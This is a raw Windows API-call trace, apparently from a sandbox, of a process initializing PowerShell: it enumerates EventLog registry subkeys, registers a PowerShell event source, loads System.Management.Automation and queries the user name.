	[0681.197] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.197] CoTaskMemFree (pv=0x2921e0) 
	[0681.197] CoTaskMemFree (pv=0x0) 
	[0681.197] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.197] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.197] CoTaskMemFree (pv=0x2921e0) 
	[0681.197] CoTaskMemFree (pv=0x0) 
	[0681.197] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.197] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.197] CoTaskMemFree (pv=0x2921e0) 
	[0681.197] CoTaskMemFree (pv=0x0) 
	[0681.197] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.197] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.197] CoTaskMemFree (pv=0x2921e0) 
	[0681.197] CoTaskMemFree (pv=0x0) 
	[0681.198] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.198] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.198] CoTaskMemFree (pv=0x2921e0) 
	[0681.198] CoTaskMemFree (pv=0x0) 
	[0681.198] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.198] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.198] CoTaskMemFree (pv=0x2921e0) 
	[0681.198] CoTaskMemFree (pv=0x0) 
	[0681.198] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.198] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.198] CoTaskMemFree (pv=0x2921e0) 
	[0681.198] CoTaskMemFree (pv=0x0) 
	[0681.198] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.198] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.198] CoTaskMemFree (pv=0x2921e0) 
	[0681.198] CoTaskMemFree (pv=0x0) 
	[0681.199] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.199] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.199] CoTaskMemFree (pv=0x2921e0) 
	[0681.199] CoTaskMemFree (pv=0x0) 
	[0681.199] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x344) returned 0x0
	[0681.199] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.199] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x348) returned 0x0
	[0681.199] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.199] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x34c) returned 0x0
	[0681.199] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.199] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x350) returned 0x0
	[0681.200] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.200] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x354) returned 0x0
	[0681.200] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.200] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x358) returned 0x0
	[0681.200] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.200] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x35c) returned 0x0
	[0681.200] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.200] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x360) returned 0x0
	[0681.200] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.201] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x364) returned 0x0
	[0681.201] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x368) returned 0x0
	[0681.201] RegCloseKey (hKey=0x368) returned 0x0
	[0681.201] RegCloseKey (hKey=0x340) returned 0x0
	[0681.201] RegCloseKey (hKey=0x364) returned 0x0
	[0681.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d628 | out: phkResult=0x10d628*=0x364) returned 0x0
	[0681.202] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.202] CoTaskMemFree (pv=0x0) 
	[0681.202] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.203] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.203] CoTaskMemFree (pv=0x2921e0) 
	[0681.203] CoTaskMemFree (pv=0x0) 
	[0681.203] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.203] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.203] CoTaskMemFree (pv=0x2921e0) 
	[0681.203] CoTaskMemFree (pv=0x0) 
	[0681.203] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.203] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.203] CoTaskMemFree (pv=0x2921e0) 
	[0681.203] CoTaskMemFree (pv=0x0) 
	[0681.203] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.203] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.203] CoTaskMemFree (pv=0x2921e0) 
	[0681.204] CoTaskMemFree (pv=0x0) 
	[0681.204] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.204] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.204] CoTaskMemFree (pv=0x2921e0) 
	[0681.204] CoTaskMemFree (pv=0x0) 
	[0681.204] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.204] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.204] CoTaskMemFree (pv=0x2921e0) 
	[0681.204] CoTaskMemFree (pv=0x0) 
	[0681.204] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.204] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.204] CoTaskMemFree (pv=0x2921e0) 
	[0681.204] CoTaskMemFree (pv=0x0) 
	[0681.204] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.204] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.204] CoTaskMemFree (pv=0x2921e0) 
	[0681.205] CoTaskMemFree (pv=0x0) 
	[0681.205] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.205] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x2921e0, lpcchName=0x10d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.205] CoTaskMemFree (pv=0x2921e0) 
	[0681.205] CoTaskMemFree (pv=0x0) 
	[0681.205] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x340) returned 0x0
	[0681.205] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.205] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x368) returned 0x0
	[0681.205] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.205] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x36c) returned 0x0
	[0681.205] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.206] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x370) returned 0x0
	[0681.206] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.206] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x374) returned 0x0
	[0681.206] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.206] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x378) returned 0x0
	[0681.206] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.206] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x37c) returned 0x0
	[0681.206] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.206] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x380) returned 0x0
	[0681.206] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x0) returned 0x2
	[0681.207] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x384) returned 0x0
	[0681.207] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d688 | out: phkResult=0x10d688*=0x388) returned 0x0
	[0681.207] RegCloseKey (hKey=0x388) returned 0x0
	[0681.207] RegCloseKey (hKey=0x364) returned 0x0
	[0681.207] RegCloseKey (hKey=0x384) returned 0x0
	[0681.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d5f8 | out: phkResult=0x10d5f8*=0x384) returned 0x0
	[0681.209] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.209] CoTaskMemFree (pv=0x0) 
	[0681.209] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.209] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.209] CoTaskMemFree (pv=0x2921e0) 
	[0681.209] CoTaskMemFree (pv=0x0) 
	[0681.209] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.209] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.209] CoTaskMemFree (pv=0x2921e0) 
	[0681.209] CoTaskMemFree (pv=0x0) 
	[0681.209] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.209] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.209] CoTaskMemFree (pv=0x2921e0) 
	[0681.210] CoTaskMemFree (pv=0x0) 
	[0681.210] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.210] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.210] CoTaskMemFree (pv=0x2921e0) 
	[0681.210] CoTaskMemFree (pv=0x0) 
	[0681.210] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.210] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.210] CoTaskMemFree (pv=0x2921e0) 
	[0681.210] CoTaskMemFree (pv=0x0) 
	[0681.210] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.210] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.210] CoTaskMemFree (pv=0x2921e0) 
	[0681.210] CoTaskMemFree (pv=0x0) 
	[0681.210] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.210] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.211] CoTaskMemFree (pv=0x2921e0) 
	[0681.211] CoTaskMemFree (pv=0x0) 
	[0681.211] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.211] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.211] CoTaskMemFree (pv=0x2921e0) 
	[0681.211] CoTaskMemFree (pv=0x0) 
	[0681.211] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
	[0681.211] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x2921e0, lpcchName=0x10d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.211] CoTaskMemFree (pv=0x2921e0) 
	[0681.211] CoTaskMemFree (pv=0x0) 
	[0681.211] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x364) returned 0x0
	[0681.211] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.211] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x388) returned 0x0
	[0681.211] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.212] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x38c) returned 0x0
	[0681.212] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.212] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x390) returned 0x0
	[0681.212] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.212] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x394) returned 0x0
	[0681.212] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.212] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x398) returned 0x0
	[0681.212] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.212] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x39c) returned 0x0
	[0681.213] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.213] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x3a0) returned 0x0
	[0681.213] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x0) returned 0x2
	[0681.213] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x3a4) returned 0x0
	[0681.213] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d658 | out: phkResult=0x10d658*=0x3a8) returned 0x0
	[0681.213] RegCloseKey (hKey=0x3a8) returned 0x0
	[0681.213] RegCloseKey (hKey=0x384) returned 0x0
	[0681.214] RegCloseKey (hKey=0x3a4) returned 0x0
	[0681.218] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8b0008
	[0681.538] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3278f88*="WSMan", lpRawData=0x3278cf8) returned 1
	[0681.540] CoTaskMemAlloc (cb=0x104) returned 0x2ed7f0
	[0681.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ed7f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.540] CoTaskMemFree (pv=0x2ed7f0) 
	[0681.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.542] CoTaskMemAlloc (cb=0x804) returned 0x1b345860
	[0681.542] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b345860, nSize=0x10d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d8e8) returned 0x1
	[0681.543] CoTaskMemFree (pv=0x1b345860) 
	[0681.543] CoTaskMemAlloc (cb=0x204) returned 0x2921e0
